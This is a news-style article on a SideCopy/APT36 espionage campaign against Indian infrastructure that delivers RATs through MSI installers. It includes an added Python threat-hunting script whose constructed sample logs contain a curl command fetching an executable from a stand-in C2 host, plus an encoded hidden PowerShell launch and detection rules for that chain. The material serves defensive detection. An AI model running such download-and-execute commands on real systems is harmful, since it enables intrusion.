A Pakistan-linked cyber espionage group has significantly broadened its targeting footprint in a new wave of attacks against Indian organizations. According to a report published by cybersecurity firm SEQRITE, this advanced persistent threat (APT) actor, believed to be associated with the SideCopy subgroup of Transparent Tribe (APT36), has shifted tactics and tools in its recent campaigns that began around December 2024.
The threat actor, previously known for targeting Indian defense, diplomatic, and maritime sectors, is now infiltrating critical civil infrastructure. Recent campaigns have reportedly targeted India’s railway network, oil and gas enterprises, and the Ministry of External Affairs. The motive appears to be strategic cyber-espionage — harvesting sensitive data and maintaining long-term access to critical Indian systems.
Shift in Tactics: From HTA to MSI
One of the notable changes in the latest campaign is the replacement of legacy HTML Application (HTA) files with Microsoft Installer (MSI) packages to deliver malware. MSI files are commonly used for legitimate software installations, helping the attackers evade detection by traditional security tools and increase user trust.
These MSI packages are laced with remote access trojans (RATs) that serve as the primary tools for data theft, reconnaissance, and long-term surveillance.
A Trio of Malware Tools
The attackers utilize a variety of sophisticated malware tools, including:
- CurlBack RAT: A newly discovered Windows-based malware capable of command execution, privilege escalation, file exfiltration, and persistence. The malware uses Windows curl to communicate with its command-and-control (C2) server, which enables stealthy data transfers.
- Spark RAT: A powerful cross-platform RAT developed in Node.js. It supports multiple commands, including file manipulation and command execution, and is used to target both Windows and Linux machines.
- Xeno RAT: A customized version of an open-source RAT with additional modules and capabilities tailored for stealth and persistence.
These tools collectively allow the threat group to establish deep footholds within the victim systems while minimizing the risk of detection.
Social Engineering and Delivery Methods
The threat actors continue to rely on social engineering tactics. Victims are lured through phishing emails containing malicious MSI attachments disguised as legitimate documents. Some of the bait themes observed include fake Indian Railways holiday lists and cybersecurity awareness documents impersonating Hindustan Petroleum Corporation Limited (HPCL).
Once executed, the MSI installer uses a multi-stage infection chain involving PowerShell scripts, AES decryption, and DLL side-loading techniques to activate the malware while bypassing endpoint defenses.
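For defenders, the chain described above (an MSI package that spawns PowerShell, an encoded command, follow-on use of the built-in curl utility for C2, and payloads dropped under user-writable paths) is visible in ordinary process-creation telemetry. The following is an added example, not code from the SEQRITE report or from the page, that applies a small set of parent/child and command-line rules to Sysmon-style process events. All events, paths, file names, the hypothetical placeholder-c2.example host and the rule names are constructed for illustration; none are indicators from the report.

```python
"""Hunt for an MSI -> PowerShell -> curl delivery chain in process-creation logs.

Added example (not from the SEQRITE report). The events below are constructed;
field names follow the Sysmon Event ID 1 layout but the values are invented.
"""
from dataclasses import dataclass
import ntpath
import re


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the new process image
    cmdline: str   # command line as logged
    user: str


# Constructed sample telemetry: one benign system-initiated msiexec and one
# user-launched installer that behaves like the chain described in the article.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe", r"CORP\alice"),
    ProcEvent(200, 100, r"C:\Windows\System32\msiexec.exe",
              r'msiexec.exe /i "C:\Users\alice\Downloads\Holiday_List_2025.msi"', r"CORP\alice"),
    ProcEvent(201, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoP -W Hidden -enc AAAA",  # payload text is a placeholder
              r"CORP\alice"),
    ProcEvent(202, 201, r"C:\Windows\System32\curl.exe",
              r"curl.exe -s -o C:\Users\Public\stage.exe http://placeholder-c2.example/s2",
              r"CORP\alice"),
    ProcEvent(203, 201, r"C:\Users\Public\stage.exe", "stage.exe", r"CORP\alice"),
    ProcEvent(300, 1, r"C:\Windows\System32\services.exe", "services.exe", r"NT AUTHORITY\SYSTEM"),
    ProcEvent(301, 300, r"C:\Windows\System32\msiexec.exe", "msiexec.exe /V", r"NT AUTHORITY\SYSTEM"),
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Directories an installer should rarely launch executables from.
USER_WRITABLE = re.compile(
    r"\\(?:users\\[^\\]+\\(?:downloads|appdata)|users\\public|windows\\temp)\\", re.I)
# PowerShell's encoded-command switch and its common abbreviations.
ENCODED_PS = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b", re.I)


def basename(image: str) -> str:
    return ntpath.basename(image).lower()


def ancestors(pid: int, by_pid: dict):
    """Yield parent, grandparent, ... until the chain leaves the log or loops."""
    seen = set()
    ev = by_pid.get(pid)
    while ev and ev.ppid in by_pid and ev.ppid not in seen:
        seen.add(ev.ppid)
        ev = by_pid[ev.ppid]
        yield ev


def hunt(events):
    """Return one finding dict per rule hit: pid, image, rule, severity."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        pname = basename(parent.image) if parent else ""
        lineage = {basename(a.image) for a in ancestors(e.pid, by_pid)}

        def hit(rule, severity):
            findings.append({"pid": e.pid, "image": e.image, "rule": rule, "severity": severity})

        # An installer handing off to a script interpreter is the core of the chain.
        if name in SCRIPT_HOSTS and pname == "msiexec.exe":
            hit("msi_spawns_script_host", "high")
        # Encoded PowerShell is a staple of multi-stage loaders.
        if name in {"powershell.exe", "pwsh.exe"} and ENCODED_PS.search(e.cmdline):
            hit("encoded_powershell", "medium")
        # Built-in curl used anywhere beneath an installer: likely stage-2 fetch or C2.
        if name == "curl.exe" and "msiexec.exe" in lineage:
            hit("curl_under_installer", "high")
        # Executables started from user-writable paths under an installer are where
        # dropped side-loading hosts and their DLLs typically live.
        if "msiexec.exe" in lineage and USER_WRITABLE.search(e.image):
            hit("exec_from_user_writable_under_installer", "high")
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f['severity']}] pid={f['pid']} {f['rule']}: {f['image']}")
```

The ancestry walk matters more than any single parent/child pair: the curl and dropped-executable rules fire on lineage, so a loader that inserts cmd.exe or another hop between msiexec and the network fetch still surfaces, while the SYSTEM-initiated msiexec in the sample produces no findings. In production these rules belong in a SIEM or EDR query over the same fields, with allow-lists for legitimate packaging workflows.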
Strategic Implications
This new campaign demonstrates an evolution in the group’s operational sophistication and a shift in focus toward critical infrastructure. The timing and expanded targeting suggest that APT36 is aligning its objectives with broader geopolitical interests.
Cybersecurity experts warn that such campaigns could escalate tensions in the region, especially if critical data or operational technology (OT) systems are compromised. Organizations across Indian sectors are urged to monitor for indicators of compromise (IOCs), adopt layered defense strategies, and educate staff about phishing threats.
The SEQRITE report serves as a stark reminder that nation-state-backed cyber operations are no longer limited to defense or diplomatic targets. Civil infrastructure is now firmly in the crosshairs — and the stakes are higher than ever.